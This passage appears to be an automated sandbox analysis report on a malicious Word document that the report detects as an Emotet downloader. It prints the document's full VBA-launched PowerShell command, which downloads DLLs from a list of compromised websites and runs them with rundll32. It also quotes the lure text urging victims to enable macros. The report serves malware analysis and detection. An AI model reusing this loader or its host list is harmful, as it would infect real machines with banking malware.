    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cortana.ai/api
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://cr.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dataservice.o365filtering.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dataservice.o365filtering.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dev.cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://devnull.onenote.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://directory.services.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://entitlement.diagnostics.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: powershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: powershell.exe, 00000006.00000003.728233664.0000000005A8B000.00000004.00000001.sdmp; String found in binary or memory: https://go.micro
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://graph.ppe.windows.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://graph.ppe.windows.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://graph.windows.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://graph.windows.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.dr; String found in binary or memory: https://incidents.diagnostics.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://lifecycle.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows.local
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://management.azure.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://management.azure.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://messaging.office.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ncus.contentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officeapps.live.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://onedrive.live.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://osi.office.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://roaming.edog.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://settings.outlook.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://staging.cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://tasks.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://wus2.contentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownDNS traffic detected: queries for: primtalent.com
    Source: global trafficHTTP traffic detected: GET /wp-admin/9yt1u/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: primtalent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /wordpress/6f0qIQlWPaYDfa/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.com

    E-Banking Fraud:

    Yara detected Emotet Downloader
    Source: Yara match | File source: C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt, type: DROPPED

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. Page1 of 1 Owords 112 O Typ
    Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
    Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
    Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. Page1 of 1 Owords 112 O Type here to search m %
    Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLEOTENT" buttons to pcenew thiS Document O O O Page1 of 1 Owords It? O T
    Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED # M,,,o,m I Shortcut Tools Use these buttons to quickly customize your obje
    Source: Screenshot number: 8 | Screenshot OCR: protected documents O You have to press "ENABLE EDITING" and "ENABLEOTENT" buttons to pcenew thiS D
    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
    Source: Document image extraction number: 0 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
    Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
    Document contains an embedded VBA with functions possibly related to ADO stream file operations
    Source: ~DF0E259767A8C316A9.TMP.0.dr | Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write
    Document contains an embedded VBA macro which may execute processes
    Source: VBA code instrumentation | OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer) | Name: fjow3efyw98efhasdokfhlnkvawofh3
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
    Source: C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP, type: DROPPED | Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
    Source: 704.doc | OLE indicator application name: unknown
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE indicator application name: unknown
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.dr | OLE indicator application name: unknown
    Source: 704.doc | OLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
    Source: VBA code instrumentation | OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_Open | Name: Document_Open
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE, VBA macro line: Private Sub Document_Open()
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: 704.doc | OLE indicator has summary info: false
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE indicator has summary info: false
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.dr | OLE indicator has summary info: false
    Source: 704.doc | OLE indicator, VBA macros: true
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE indicator, VBA macros: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{0BD9A190-463A-4553-980B-C9C874C86222} - OProcSessId.dat
    Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@8/18@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01
    Source: 704.doc | OLE document summary: title field not present or empty
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE document summary: title field not present or empty
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE document summary: author field not present or empty
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE document summary: edited time not present or 0
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.dr | OLE document summary: title field not present or empty
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.dr | OLE document summary: author field not present or empty
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.dr | OLE document summary: edited time not present or 0
